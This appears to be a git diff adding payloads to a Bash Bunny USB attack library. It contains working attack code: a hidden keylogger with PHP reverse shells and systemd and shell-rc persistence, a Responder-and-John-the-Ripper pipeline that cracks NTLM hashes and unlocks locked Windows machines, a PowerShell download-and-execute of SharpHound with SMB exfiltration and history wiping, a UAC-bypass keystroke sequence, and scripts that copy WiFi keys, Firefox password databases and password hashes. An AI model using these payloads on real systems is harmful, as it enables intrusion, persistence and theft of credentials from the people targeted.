unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
|
||||
mkdir -p /var/tmp/.system/logs
|
||||
lol=$(lsblk | grep 1.8G)
|
||||
disk=$(echo $lol | awk '{print $1}')
|
||||
mntt=$(lsblk | grep $disk | awk '{print $7}')
|
||||
cp -r $mntt/tools/xinput /var/tmp/.system/
|
||||
cp -r $mntt/payloads/library/bunnyLogger2/clctrl /var/tmp/.system/
|
||||
cp -r $mntt/payloads/library/bunnyLogger2/nc /var/tmp/.system/
|
||||
chmod +x /var/tmp/.system/nc
|
||||
echo -e "name=\$(date +\"%y-%m-%d-%T\")\n/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test > /var/tmp/.system/logs/\$name.log &\n/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys
|
||||
chmod +x /var/tmp/.system/sys
|
||||
chmod +x /var/tmp/.system/clctrl
|
||||
chmod +x /var/tmp/.system/xinput
|
||||
echo -e "while :\ndo\n\tping -c 5 127.0.0.1\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"127.0.0.1\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone &\nwhile :\ndo\n\tping -c 5 127.0.0.1\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"127.0.0.1\",5555);exec("\"/var/tmp/.system/./clctrl "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
|
||||
chmod +x /var/tmp/.system/systemBus
|
||||
mkdir -p ~/.config/systemd/user
|
||||
echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
|
||||
echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
|
||||
chmod +x /var/tmp/.system/reboot
|
||||
echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service
|
||||
systemctl --user daemon-reload
|
||||
systemctl --user enable --now systemBUS.service
|
||||
systemctl --user start --now systemBUS.service
|
||||
systemctl --user enable --now reboot.service
|
||||
systemctl --user start --now reboot.service
|
||||
echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > ~/tmmmp
|
||||
chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
|
||||
BIN
payloads/library/credentials/BunnyLogger2.0/requirements/xinput
Normal file
BIN
payloads/library/credentials/BunnyLogger2.0/requirements/xinput
Normal file
Binary file not shown.
4
payloads/library/credentials/BunnyLogger2.0/uninstall.sh
Normal file
4
payloads/library/credentials/BunnyLogger2.0/uninstall.sh
Normal file
@@ -0,0 +1,4 @@
|
||||
#!/bin/bash
|
||||
loc=$HOME/.config/bunnyLogger
|
||||
rm -rf $loc
|
||||
sudo rm /usr/local/bin/bunnyLoggerMgr
|
||||
111
payloads/library/credentials/BunnyPicker/payload.txt
Normal file
111
payloads/library/credentials/BunnyPicker/payload.txt
Normal file
@@ -0,0 +1,111 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
#Author: rf_bandit
|
||||
#Version: Version 1.0
|
||||
#Credit: Hak5Darren, Mubix, catatonic, mame82
|
||||
#Firmware: 1.7
|
||||
#Date: May 2023
|
||||
#
|
||||
# Options
|
||||
RESPONDER_OPTIONS="-w -r -d -P"
|
||||
LOOTDIR=/root/udisk/loot/bunnypicker
|
||||
WORDFILE= <PATH TO DICTIONARY HERE>
|
||||
#eg /tools/john/password.lst
|
||||
# or install via tools folding in arming mode (/tools/<wordlist>)
|
||||
PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
|
||||
|
||||
# Check for responder and john
|
||||
REQUIRETOOL responder
|
||||
REQUIRETOOL john
|
||||
|
||||
# Setup Attack
|
||||
LED SETUP
|
||||
|
||||
# Use RNDIS for Windows. Mac/*nix use ECM_ETHERNET
|
||||
ATTACKMODE HID RNDIS_ETHERNET
|
||||
#ATTACKMODE ECM_ETHERNET
|
||||
|
||||
# Set convenience variables
|
||||
GET TARGET_HOSTNAME
|
||||
GET TARGET_IP
|
||||
|
||||
# Setup named logs in loot directory
|
||||
mkdir -p $LOOTDIR
|
||||
HOST=${TARGET_HOSTNAME}
|
||||
# If hostname is blank set it to "noname"
|
||||
[[ -z "$HOST" ]] && HOST="noname"
|
||||
COUNT=$(ls -lad $LOOTDIR/$HOST* | wc -l)
|
||||
COUNT=$((COUNT+1))
|
||||
mkdir -p $LOOTDIR/$HOST-$COUNT
|
||||
|
||||
# As a backup also copy logs to a loot directory in /root/loot/
|
||||
mkdir -p /root/loot/bunnypicker/$HOST-$COUNT
|
||||
|
||||
# Check target IP address. If unset, blink RED and end.
|
||||
if [ -z "${TARGET_IP}" ]; then
|
||||
LED FAIL2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Set LED yellow, run attack
|
||||
LED ATTACK
|
||||
cd /tools/responder
|
||||
|
||||
# Clean logs directory
|
||||
rm logs/*
|
||||
|
||||
# Run Responder with specified options
|
||||
python Responder.py -I usb0 $RESPONDER_OPTIONS &
|
||||
|
||||
# Wait until NTLM log is found
|
||||
until [ -f logs/*NTLM* ]
|
||||
do
|
||||
# Ima just loop here until NTLM logs are found
|
||||
sleep 1
|
||||
done
|
||||
|
||||
# copy logs to loot directory
|
||||
cp logs/* /root/loot/bunnypicker/$HOST-$COUNT
|
||||
cp logs/* $LOOTDIR/$HOST-$COUNT
|
||||
|
||||
# Sync USB disk filesystem
|
||||
sync
|
||||
|
||||
#kill responder
|
||||
killall python
|
||||
killall python
|
||||
killall python
|
||||
|
||||
#Cracking begins!
|
||||
cd /tools/john
|
||||
LED STAGE1
|
||||
#This should be a small wordlist as we are looking for lowhanging fuit. We can do 100K passwords in ~1 second.
|
||||
#We could go CUCMBER PLAID here but its probably not needed
|
||||
./john --wordlist=$WORDFILE --pot=/root/loot/bunnypicker/$HOST-$COUNT/john.pot /root/loot/bunnypicker/$HOST-$COUNT/*.txt
|
||||
|
||||
|
||||
# Check john.pot If empty blink RED and end. Move to offline attack.
|
||||
if [[ -z $(grep '[^[:space:]]' /root/loot/bunnypicker/$HOST-$COUNT/john.pot) ]]; then
|
||||
LED FAIL3
|
||||
exit 1
|
||||
fi
|
||||
|
||||
#This will copy our cracked password to the loot folder for future use.
|
||||
LED STAGE2
|
||||
awk NR==1 /root/loot/bunnypicker/$HOST-$COUNT/john.pot | cut -d: -f2 > $LOOTDIR/$HOST-$COUNT/$HOST-$COUNT-pass.txt
|
||||
echo -n "STRING " > $PAYLOAD_DIR/pass.txt
|
||||
cat $LOOTDIR/$HOST-$COUNT/$HOST-$COUNT-pass.txt >> $PAYLOAD_DIR/pass.txt
|
||||
|
||||
#This should unlock the machine with our cracked password.
|
||||
#$PAYLOAD_DIR would not work with QUACK
|
||||
QUACK ESC
|
||||
DELAY 100
|
||||
QUACK $SWITCH_POSITION/pass.txt
|
||||
QUACK ENTER
|
||||
rm $PAYLOAD_DIR/pass.txt
|
||||
|
||||
LED CLEANUP
|
||||
sync
|
||||
|
||||
# When the light turns green its a hacked machine.
|
||||
LED FINISH
|
||||
117
payloads/library/credentials/BunnyPicker/readme.md
Normal file
117
payloads/library/credentials/BunnyPicker/readme.md
Normal file
@@ -0,0 +1,117 @@
|
||||
# Bunnypicker (Win10 Lockpicker for Bash Bunny)
|
||||
.______ __ __ .__ __. .__ __. ____ ____ .______ __ ______ __ ___ _______ .______
|
||||
| _ \ | | | | | \ | | | \ | | \ \ / / | _ \ | | / || |/ / | ____|| _ \
|
||||
| |_) | | | | | | \| | | \| | \ \/ / | |_) | | | | ,----'| ' / | |__ | |_) |
|
||||
| _ < | | | | | . ` | | . ` | \_ _/ | ___/ | | | | | < | __| | /
|
||||
| |_) | | `--' | | |\ | | |\ | | | | | | | | `----.| . \ | |____ | |\ \----.
|
||||
|______/ \______/ |__| \__| |__| \__| |__| | _| |__| \______||__|\__\ |_______|| _| `._____|
|
||||
,
|
||||
/| __
|
||||
/ | ,-~ /
|
||||
Y :| // /
|
||||
| jj /( .^
|
||||
>-"~"-v"
|
||||
/ Y
|
||||
jo o |
|
||||
( ~T~ j
|
||||
>._-' _./
|
||||
/ "~" |
|
||||
Y _, |
|
||||
/| ;-"~ _ l
|
||||
/ l/ ,-"~ \
|
||||
\//\/ .- \
|
||||
Y / Y -Row
|
||||
l I !
|
||||
]\ _\ /"\
|
||||
(" ~----( ~ Y. )
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
|
||||
Author: rf_bandit
|
||||
Version: Version 1.0
|
||||
Credit: Hak5Darren, Mubix, catatonic, mame82
|
||||
Firmware: 1.7
|
||||
Target: Windows 10/11
|
||||
Date: May 2023
|
||||
|
||||
## Description
|
||||
This is based on Quickcreds, Jackalope, and Win10Lockpicker (for the OG P4wnP1)
|
||||
Snags credentials from locked machines
|
||||
Implements a responder attack. Saves creds to the loot folder on the USB Disk
|
||||
Looks for *NTLM* log files
|
||||
Cracks hash with John the Ripper. Best with a smaller dictionary.
|
||||
Saves cracked hash to loot folder
|
||||
Quacks password and unlocks machine
|
||||
|
||||
On a current (May 2023) Win10/Win11 machine, it shouldn't take more about 35 seconds to get a hash.
|
||||
If attack stage lasts longer than ~1, try disconnecting/reconnecting from wifi/network.
|
||||
We can run through 100K simple passwords in 1 second.
|
||||
Best time I got was 29.60 seconds from Bash Bunny boot to machine unlock.
|
||||
|
||||
|
||||
|
||||
## Configuration
|
||||
.
|
||||
Configured for Windows. Not tested on Mac/*nix
|
||||
The path to the wordfile needs to be configured, eg /tools/<your-file-here> or /tools/john/password.lst (included) . The most straightforwrd way to get a large wordlist is to put it in the /tools folder in arming mode. A future version could check for a wordlist in /tools and if not found fallback to the included /tools/john/password.lst.
|
||||
|
||||
|
||||
## Requirements
|
||||
|
||||
Responder must be in /tools/responder/
|
||||
(Can be otained from https://forums.hak5.org/topic/40971-info-tools/)
|
||||
JtR must be in /tools/john
|
||||
Requires initial setup (below)
|
||||
|
||||
## Initial Setup
|
||||
Install responder from https://forums.hak5.org/topic/40971-info-tools/
|
||||
|
||||
Replace /etc/apt/sources.list with:
|
||||
deb http://archive.debian.org/debian/ jessie main non-free contrib
|
||||
deb-src http://archive.debian.org/debian/ jessie main non-free contrib
|
||||
deb http://archive.debian.org/debian-security/ jessie/updates main non-free contrib
|
||||
deb-src http://archive.debian.org/debian-security/ jessie/updates main non-free contrib
|
||||
|
||||
apt update (DO NOT RUN apt upgrade as it will break RNDIS_ETHERNET. Not entirely clear why.)
|
||||
|
||||
The john package included can't handle NTLM hashes so we will make our own.
|
||||
Install gcc and git if you don't have them.
|
||||
|
||||
apt-get install gcc
|
||||
|
||||
apt-get install git
|
||||
git config --global http.sslverify "false" (this is insecure but I'm not worried)
|
||||
|
||||
git clone https://github.com/openwall/john
|
||||
|
||||
cd john
|
||||
./configure && make
|
||||
mv run /tools/john
|
||||
cd ..
|
||||
rm -r john (not required but a space saving measure)
|
||||
|
||||
|
||||
## STATUS
|
||||
|
||||
|
||||
| Status | Description |
|
||||
| ------------------- | ---------------------------------------- |
|
||||
| LED SETUP | Starting |
|
||||
| LED ATTACK | Grabbing creds |
|
||||
| LED STAGE1 | Running JtR |
|
||||
| LED STAGE2 | Unlocking |
|
||||
| LED CLEANUP | Sync to disk |
|
||||
| LED FINISH | Trap is clean |
|
||||
| FAIL1 | Responder not found at /tools/responder |
|
||||
| FAIL2 | Target did not aquire IP address |
|
||||
| FAIL3 | Hash not cracked - move to offline attack|
|
||||
|
||||
## ADDITIONAL NOTES
|
||||
|
||||
For debugging its better to use LED B for STAGE1 and LED W for STAGE2 because its easier to pinpoint failure.
|
||||
A future version could check for a wordlist in /tools and if not found fallback to /tools/john/password.lst.
|
||||
Might also steal catatonic's use of the switch (very cool) to initiate password quacking to make the payload more versatile on both locked
|
||||
and unlocked machines.
|
||||
|
||||
This was fun to make. Thanks to everyone who put in all the hard work before me.
|
||||
|
||||
446
payloads/library/credentials/Bunnyhound/SharpHound.ps1
Normal file
446
payloads/library/credentials/Bunnyhound/SharpHound.ps1
Normal file
File diff suppressed because one or more lines are too long
64
payloads/library/credentials/Bunnyhound/payload.txt
Normal file
64
payloads/library/credentials/Bunnyhound/payload.txt
Normal file
@@ -0,0 +1,64 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: Bunnyhound
|
||||
# Author: golem445
|
||||
# Version: 1.0
|
||||
# Dependencies: Impacket, gohttp
|
||||
# Runtime: Dependent on domain size
|
||||
#
|
||||
#
|
||||
# Sets up Ethernet and HID keyboard interfaces simultaneously,
|
||||
# then uses HID to import Sharphound into memory via local
|
||||
# web server and execute the attack. Results are exported
|
||||
# to the loot directory via SMB.
|
||||
|
||||
# Start Setup
|
||||
LED SETUP
|
||||
|
||||
# Check dependencies
|
||||
REQUIRETOOL impacket gohttp
|
||||
GET SWITCH_POSITION
|
||||
|
||||
# Temporary loot directory
|
||||
mkdir -p /loot/smb/
|
||||
|
||||
# Permanent loot directory
|
||||
mkdir -p /root/udisk/loot/bunnyhound_exfil/
|
||||
|
||||
# Set interfaces
|
||||
ATTACKMODE RNDIS_ETHERNET HID
|
||||
|
||||
# Start web server
|
||||
cd /root/udisk/payloads/$SWITCH_POSITION
|
||||
gohttp -p 80 &
|
||||
|
||||
# Start SMB Server
|
||||
python /tools/impacket/examples/smbserver.py s /loot/smb &
|
||||
|
||||
# Start attack
|
||||
LED ATTACK
|
||||
RUN WIN powershell
|
||||
Q STRING "IEX (New-Object Net.Webclient).DownloadString('http://172.16.64.1/s.ps1')"
|
||||
Q ENTER
|
||||
|
||||
# Wait until files are done copying.
|
||||
LED STAGE2
|
||||
while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done
|
||||
|
||||
# Start Cleanup
|
||||
LED CLEANUP
|
||||
|
||||
# Delete Exfil file
|
||||
rm /loot/smb/EXFILTRATION_COMPLETE
|
||||
|
||||
# Move Kerberos SPNS to permanent loot directory
|
||||
mv /loot/smb/* /root/udisk/loot/bunnyhound_exfil/
|
||||
|
||||
# Clean up temporary loot directory
|
||||
rm -rf /loot/smb/*
|
||||
|
||||
# Sync file system
|
||||
sync
|
||||
|
||||
# Complete
|
||||
LED FINISH
|
||||
32
payloads/library/credentials/Bunnyhound/readme.md
Normal file
32
payloads/library/credentials/Bunnyhound/readme.md
Normal file
@@ -0,0 +1,32 @@
|
||||
# Bunnyhound
|
||||
* Author: golem445
|
||||
* Version: 1.0
|
||||
* Target: Windows Domains
|
||||
|
||||
## Description
|
||||
|
||||
Sets up Ethernet and HID keyboard interfaces simultaneously,
|
||||
then uses HID to import Sharphound into memory via Bash Bunny
|
||||
web server and execute the attack. Results are exported to
|
||||
the loot directory via SMB.
|
||||
|
||||
Note: This module will bypass network restrictions on USB
|
||||
disk drives as only a network card and keyboard are emulated.
|
||||
|
||||
## Requirements
|
||||
|
||||
Impacket and gohttp should be installed
|
||||
|
||||
## STATUS
|
||||
|
||||
| Status | Description |
|
||||
| ------------------- | ---------------------------------------- |
|
||||
| Flashing Red | Impacket or gohttp not found |
|
||||
| Solid Violet | Setup for attack |
|
||||
| Flashing Amber | Attack in progress |
|
||||
| Flashing Cyan | Cleaning up |
|
||||
| Solid Green | Attack complete |
|
||||
|
||||
## Credits
|
||||
|
||||
* Hak5Darren for SMB exfil
|
||||
5
payloads/library/credentials/Bunnyhound/s.ps1
Normal file
5
payloads/library/credentials/Bunnyhound/s.ps1
Normal file
@@ -0,0 +1,5 @@
|
||||
IEX (New-object Net.Webclient).DownloadString('http://172.16.64.1/Sharphound.ps1');Invoke-Bloodhound -NoSaveCache -CompressData
|
||||
move Blood* \\172.16.64.1\s\
|
||||
New-Item -Path \\172.16.64.1\s -ItemType "file" -Name "EXFILTRATION_COMPLETE" -Value "EXFILTRATION_COMPLETE"
|
||||
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
|
||||
exit
|
||||
@@ -6,23 +6,23 @@
|
||||
# Build: 1004
|
||||
# Category: Exfiltration
|
||||
# Target: Windows Windows 10 (Powershell)
|
||||
# Attackmodes: HID, Ethernet
|
||||
# Attackmodes: HID, Ethernet
|
||||
# !!! works only with Bash Bunny FW 1.1 and up !!!
|
||||
#
|
||||
#
|
||||
# LED Status
|
||||
# ----------------------- + --------------------------------------------
|
||||
# SETUP + Setup
|
||||
#
|
||||
#
|
||||
# LED Status
|
||||
# ----------------------- + --------------------------------------------
|
||||
# SETUP + Setup
|
||||
# FAIL + No /tools/impacket/examples/smbserver.py found
|
||||
# FAIL2 + Target did not acquire IP address
|
||||
# Yellow single blink + Initialization
|
||||
# Yellow double blink + HID Stage
|
||||
# Yellow triple blink + Wait for IP coming up
|
||||
# Cyan inv single blink + Wait for Handshake (SMBServer Coming up)
|
||||
# Cyan inv quint blink + Powershell scripts running
|
||||
# White fast blink + Cleanup, copy Files to <root>/loot
|
||||
# Green + Finished
|
||||
# ----------------------- + --------------------------------------------
|
||||
# FAIL2 + Target did not acquire IP address
|
||||
# Yellow single blink + Initialization
|
||||
# Yellow double blink + HID Stage
|
||||
# Yellow triple blink + Wait for IP coming up
|
||||
# Cyan inv single blink + Wait for Handshake (SMBServer Coming up)
|
||||
# Cyan inv quint blink + Powershell scripts running
|
||||
# White fast blink + Cleanup, copy Files to <root>/loot
|
||||
# Green + Finished
|
||||
# ----------------------- + --------------------------------------------
|
||||
|
||||
logger -t DumpCred_2.1 "########################### Start payload DumpCred_2.1 #############################"
|
||||
|
||||
@@ -30,6 +30,7 @@ logger -t DumpCred_2.1 "########################### Start payload DumpCred_2.1 #
|
||||
###### Lets Start ####
|
||||
LED SETUP
|
||||
|
||||
GET SWITCH_POSITION
|
||||
|
||||
# Some Variables
|
||||
SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION
|
||||
@@ -39,13 +40,13 @@ LOOTDIR=$SWITCHDIR/loot
|
||||
if [ -f $SWITCHDIR/DEBUG ];then
|
||||
DEBUG=1 # 1= Debug on / 0= Debug off
|
||||
tail -f /var/log/syslog > /tmp/log.txt &
|
||||
else
|
||||
else
|
||||
DEBUG=0
|
||||
fi
|
||||
|
||||
mkdir -p $LOOTDIR
|
||||
mkdir -p $LOOTDIR
|
||||
|
||||
REQUIRETOOL impacket
|
||||
REQUIRETOOL impacket
|
||||
|
||||
# remove old Handshake Files
|
||||
rm -f $SWITCHDIR/CON_*
|
||||
@@ -60,8 +61,8 @@ Q DELAY 5000
|
||||
|
||||
# Launch initial cmd
|
||||
if [ $DEBUG -eq 1 ]; then
|
||||
RUN WIN cmd
|
||||
else
|
||||
RUN WIN cmd
|
||||
else
|
||||
RUN WIN cmd /k mode con lines=1 cols=100
|
||||
fi
|
||||
|
||||
@@ -69,7 +70,7 @@ fi
|
||||
Q DELAY 1000
|
||||
if [ $DEBUG -eq 1 ]; then
|
||||
Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:4f'-Verb runAs"
|
||||
else
|
||||
else
|
||||
Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:4f /k mode con lines=1 cols=100' -Verb runAs"
|
||||
fi
|
||||
Q DELAY 500
|
||||
@@ -77,12 +78,12 @@ Q ENTER
|
||||
|
||||
|
||||
# Bypass UAC :: Change "ALT j" and "ALT n" according to your language i.e. for us it is ALT o (OK) and ALT c (cancel)
|
||||
|
||||
# With Admin rights the UAC prompt opens. ALT j goes to the prompt and the admin CMD windows opens. The ALT n goes to this Window (doesn't matter) than Enter for Newline
|
||||
# now the second powershell command goes to the admin cmd windows.
|
||||
|
||||
# With no Adminrights the the credentils prompt opens. ALT j doesn't do anything because there are no credentials. Then ALT n cancels the credentials propmpt.
|
||||
# the second powershell command goes to the cmd Windows I open first.
|
||||
# With Admin rights the UAC prompt opens. ALT j goes to the prompt and the admin CMD windows opens. The ALT n goes to this Window (doesn't matter) than Enter for Newline
|
||||
# now the second powershell command goes to the admin cmd windows.
|
||||
|
||||
# With no Adminrights the the credentils prompt opens. ALT j doesn't do anything because there are no credentials. Then ALT n cancels the credentials propmpt.
|
||||
# the second powershell command goes to the cmd Windows I open first.
|
||||
Q DELAY 1000
|
||||
Q ALT j
|
||||
Q DELAY 500
|
||||
@@ -109,7 +110,6 @@ logger -t DumpCred_2.1 "### Enter Ethernet Stage ###"
|
||||
# Ethernet Tage
|
||||
LED STAGE3
|
||||
ATTACKMODE RNDIS_ETHERNET
|
||||
# Source bunny_helpers.sh to get environment variables
|
||||
|
||||
logger -t DumpCred_2.1 "### Start SMBServer ###"
|
||||
# Start SMB Server
|
||||
@@ -149,7 +149,7 @@ logger -t DumpCred_2.1 "### cleanup and copy files ###"
|
||||
if ! [ -d /root/udisk/loot/DumpCred_2.1 ]; then
|
||||
mkdir -p /root/udisk/loot/DumpCred_2.1
|
||||
fi
|
||||
mv -f $LOOTDIR/* /root/udisk/loot/DumpCred_2.1
|
||||
mv -f $LOOTDIR/* /root/udisk/loot/DumpCred_2.1
|
||||
rmdir $LOOTDIR
|
||||
rm -f $SWITCHDIR/CON_EOF
|
||||
|
||||
@@ -163,4 +163,4 @@ fi
|
||||
|
||||
ATTACKMODE RNDIS_ETHERNET STORAGE
|
||||
sync; sleep 1; sync
|
||||
LED FINISH
|
||||
LED FINISH
|
||||
|
||||
@@ -0,0 +1,6 @@
|
||||
mkdir %~dp0\loot\%COMPUTERNAME%
|
||||
cd /D %~dp0\loot\%COMPUTERNAME% && netsh wlan export profile key=clear
|
||||
C: cd \D %appdata%\mozilla\firefox\profiles\
|
||||
cd %appdata%\mozilla\firefox\profiles\*.default-release\
|
||||
copy key4.db %~dp0\loot\%COMPUTERNAME%
|
||||
copy logins.json %~dp0\loot\%COMPUTERNAME%
|
||||
45
payloads/library/credentials/FireSnatcher/README.md
Normal file
45
payloads/library/credentials/FireSnatcher/README.md
Normal file
@@ -0,0 +1,45 @@
|
||||
# Title: FireSnatcher
|
||||
# Description: Copies Wifi Keys, and Firefox Password Databases
|
||||
# Author: KarrotKak3
|
||||
# Props: saintcrossbow & 0i41E
|
||||
# Version: 1.0.2.0 (Work in Progress)
|
||||
# Category: Credentials
|
||||
# Target: Windows (Logged in)
|
||||
# Attackmodes: HID, Storage
|
||||
|
||||
# Full Description
|
||||
# ----------------
|
||||
# Attacks an Unlocked Windows Machine
|
||||
# Payload targets:
|
||||
# - All WiFi creds
|
||||
# - Firefox Saved Password Database
|
||||
#
|
||||
# PAYLOAD RUNS START TO FINISH IN ABOUT 20 SEC
|
||||
# Delays to Allow Powershell Time to Open and to Give Attack time to Run
|
||||
|
||||
# HOW TO USE PASSWORD DB: COPY KEY4.DB AND LOGINS.JSON TO YOUR COMPUTER AT
|
||||
# %APPDATA%\MOZILLA\FIREFOX\PROFILES\*.DEFAULT-RELEASE
|
||||
# Open Firefox and find loot in Settings-> Privacy & Security -> Saved Logins
|
||||
|
||||
|
||||
# KNOWN ISSUES
|
||||
# ---------------
|
||||
# Loot is saved in Payloads/switch#/loot
|
||||
|
||||
|
||||
# Files
|
||||
# -----
|
||||
# - payload.txt: Starts the attack. All configuration contained in this file.
|
||||
# - FireSnatcher.bat: Worker that grabs Creds
|
||||
|
||||
|
||||
# Setup
|
||||
# -----
|
||||
# - Place the payload.txt and FireSnatcher.bat in Payload folder
|
||||
# - If you are using a SD card, copy FireSnatcher.bat under /payloads/switchn/ (where n is the switch you are running)
|
||||
# - Good idea to have the Bunny ready to copy to either the device or SD for maximum versatility
|
||||
|
||||
**LED meanings**
|
||||
- Magenta: Initial setup – about 1 – 3 seconds
|
||||
- Single yellow blink: Attack in progress
|
||||
- Green rapid flash, then solid, then off: Attack complete
|
||||
78
payloads/library/credentials/FireSnatcher/payload.txt
Normal file
78
payloads/library/credentials/FireSnatcher/payload.txt
Normal file
@@ -0,0 +1,78 @@
|
||||
# Title: FireSnatcher
|
||||
# Description: Copies Wifi Keys, and Firefox Password Databases
|
||||
# Author: KarrotKak3
|
||||
# Props: saintcrossbow & 0i41E
|
||||
# Version: 1.0.2.0 (Work in Progress)
|
||||
# Category: Credentials
|
||||
# Target: Windows (Logged in)
|
||||
# Attackmodes: HID, Storage
|
||||
|
||||
# Full Description
|
||||
# ----------------
|
||||
# Attacks an Unlocked Windows Machine
|
||||
# Payload targets:
|
||||
# - All WiFi creds
|
||||
# - Firefox Saved Password Database
|
||||
#
|
||||
# PAYLOAD RUNS START TO FINISH IN ABOUT 20 SEC
|
||||
# Delays to Allow Powershell Time to Open and to Give Attack time to Run
|
||||
|
||||
# HOW TO USE PASSWORD DB: COPY KEY4.DB AND LOGINS.JSON TO YOUR COMPUTER AT
|
||||
# %APPDATA%\MOZILLA\FIREFOX\PROFILES\*.DEFAULT-RELEASE
|
||||
# Open Firefox and find loot in Settings-> Privacy & Security -> Saved Logins
|
||||
|
||||
|
||||
# KNOWN ISSUES
|
||||
# ---------------
|
||||
# Loot is saved in Payloads/switch#/loot
|
||||
|
||||
|
||||
# Files
|
||||
# -----
|
||||
# - payload.txt: Starts the attack. All configuration contained in this file.
|
||||
# - FireSnatcher.bat: Worker that grabs Creds
|
||||
|
||||
|
||||
# Setup
|
||||
# -----
|
||||
# - Place the payload.txt and FireSnatcher.bat in Payload folder
|
||||
# - If you are using a SD card, copy FireSnatcher.bat under /payloads/switchn/ (where n is the switch you are running)
|
||||
# - Good idea to have the Bunny ready to copy to either the device or SD for maximum versatility
|
||||
|
||||
# LEDs
|
||||
# ----
|
||||
# Magenta: Initial setup – about 1 – 3 seconds
|
||||
# Single yellow blink: Attack in progress
|
||||
# Green rapid flash, then solid, then off: Attack complete – Bash Bunny may be removed
|
||||
|
||||
# Options
|
||||
# -------
|
||||
# Name of Bash Bunny volume that appears to Windows (BashBunny is default)
|
||||
BB_NAME="BashBunny"
|
||||
|
||||
# Setup
|
||||
# -----
|
||||
LED SETUP
|
||||
|
||||
|
||||
# Attack
|
||||
# ------
|
||||
ATTACKMODE HID STORAGE
|
||||
Q DELAY 500
|
||||
LED ATTACK
|
||||
Q DELAY 100
|
||||
Q GUI r
|
||||
Q DELAY 100
|
||||
Q STRING powershell Start-Process powershell
|
||||
Q ENTER
|
||||
Q DELAY 7000
|
||||
Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\FireSnatcher.bat')"
|
||||
Q ENTER
|
||||
Q DELAY 8000
|
||||
Q STRING EXIT
|
||||
Q ENTER
|
||||
sync
|
||||
LED FINISH
|
||||
Q DELAY 1500
|
||||
shutdown now
|
||||
|
||||
2
payloads/library/credentials/HashDumpBunny/BunnyDump.bat
Normal file
2
payloads/library/credentials/HashDumpBunny/BunnyDump.bat
Normal file
File diff suppressed because one or more lines are too long
20
payloads/library/credentials/HashDumpBunny/README.md
Normal file
20
payloads/library/credentials/HashDumpBunny/README.md
Normal file
@@ -0,0 +1,20 @@
|
||||
**Title: HashDumpBunny**
|
||||
|
||||
Author: 0i41E
|
||||
|
||||
Version: 1.0
|
||||
|
||||
**Instruction:**
|
||||
|
||||
This payload will run an obfuscated script to dump user hashes. If you don't trust this obfuscated .bat file, you should run it within a save space first - which should be best practice anyways ;-)
|
||||
|
||||
#
|
||||
**!Depending on your Windows version, this might not work as intended!**
|
||||
#
|
||||
**Instruction:**
|
||||
|
||||
Place BunnyDump.bat in the same payload switch-folder as your payload.txt
|
||||
#
|
||||
Plug in BashBunny.
|
||||
Exfiltrate the out.txt file and try to crack the hashes.
|
||||

|
||||
BIN
payloads/library/credentials/HashDumpBunny/censoredhash.png
Normal file
BIN
payloads/library/credentials/HashDumpBunny/censoredhash.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 13 KiB |
44
payloads/library/credentials/HashDumpBunny/payload.txt
Normal file
44
payloads/library/credentials/HashDumpBunny/payload.txt
Normal file
@@ -0,0 +1,44 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: HashDumpBunny
|
||||
# Description: Dump user hashes with this script, which was obfuscated with multiple layers.
|
||||
# Author: 0i41E
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Attackmodes: HID, Storage
|
||||
|
||||
LED SETUP
|
||||
|
||||
Q DELAY 500
|
||||
|
||||
GET SWITCH_POSITION
|
||||
DUCKY_LANG de
|
||||
|
||||
Q DELAY 500
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
|
||||
|
||||
LED STAGE1
|
||||
|
||||
#After you have adapted the delays for your target, add "-W hidden"
|
||||
Q DELAY 1000
|
||||
RUN WIN "powershell Start-Process powershell -Verb runAs"
|
||||
Q ENTER
|
||||
Q DELAY 1000
|
||||
